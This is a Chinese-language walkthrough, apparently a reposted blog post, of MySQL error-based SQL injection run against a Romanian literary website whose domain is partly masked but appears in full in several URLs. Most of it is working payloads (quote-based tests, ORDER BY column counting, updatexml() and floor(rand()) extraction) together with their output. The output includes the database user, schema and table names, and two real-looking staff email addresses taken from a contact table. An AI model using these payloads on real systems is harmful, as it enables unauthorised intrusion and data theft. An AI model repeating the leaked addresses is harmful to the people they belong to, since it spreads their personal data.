0x1 判断注入点:

http://www.xxxx.ro/s.php?id=1'

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

MySQL基于报错注入1 Safe 第1张

那么尝试闭合下单引号

http://www.xxxx.ro/s.php?id=1' --+

MySQL基于报错注入1 Safe 第2张

 

0x2 枚举下表的列

http://www.xxxx.ro/s.php?id=1' order by 4 --+

MySQL基于报错注入1 Safe 第3张

http://www.xxxx.ro/s.php?id=1' order by 3 --+

MySQL基于报错注入1 Safe 第4张

 

可以判断为3列

 

0x3 使用updatexml() 获取数据库的相关信息

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) --+

MySQL基于报错注入1 Safe 第5张

romanian_rowri@localhost

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

MySQL基于报错注入1 Safe 第6张

romanian_svc

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),1) --+

MySQL基于报错注入1 Safe 第7张

5.5.46-0ubuntu0.14.04.2

获取数据库名也可以通过以下方式:

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata  limit 1,1),0x7e),1) --+

MySQL基于报错注入1 Safe 第8张

 

0x4 获取库的表名

http://www.romanianwriters.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='romanian_svc'  limit 0,1),0x7e),1) --+

MySQL基于报错注入1 Safe 第9张

ra_autori

ra_carti

ra_carti_autori

ra_carti_critics

ra_carti_pdf

ra_contact

未发现相关后台的表,最后通过SQLmap确认确实没啥大的用处。

 MySQL基于报错注入1 Safe 第10张

 

0x5 获取标的字段

ra_contact

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='ra_contact'  limit 0,1),0x7e),1) --+

MySQL基于报错注入1 Safe 第11张

id,nume,functie,email,poza

0x6 获取字段数据

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select distinct concat(0x23,id,0x3a,email,0x23) from ra_contact  limit 0,1),0x7e),1) --+

MySQL基于报错注入1 Safe 第12张

1:catalina.staicu@polirom.ro

4:lucian.teodorovici@polirom.ro

 

 

另外一种方式:

http://www.xxxx.ro/s.php?id=1' and '1'='1 #闭合

http://www.xxxx.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

MySQL基于报错注入1 Safe 第13张

 

获取当前数据库:

http://www.romanianwriters.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

romanian_svc

获取当前数据库权限:

http://www.xxxx.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

romanian_rowri@localhost

获取库对应的表

http://www.xxxx.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

MySQL基于报错注入1 Safe 第14张

 

 

获取表的数据

http://www.xxxx.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,id,0x3a,email,0x23) FROM romanian_svc.ra_contact limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

MySQL基于报错注入1 Safe 第15张

 

完结! 

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄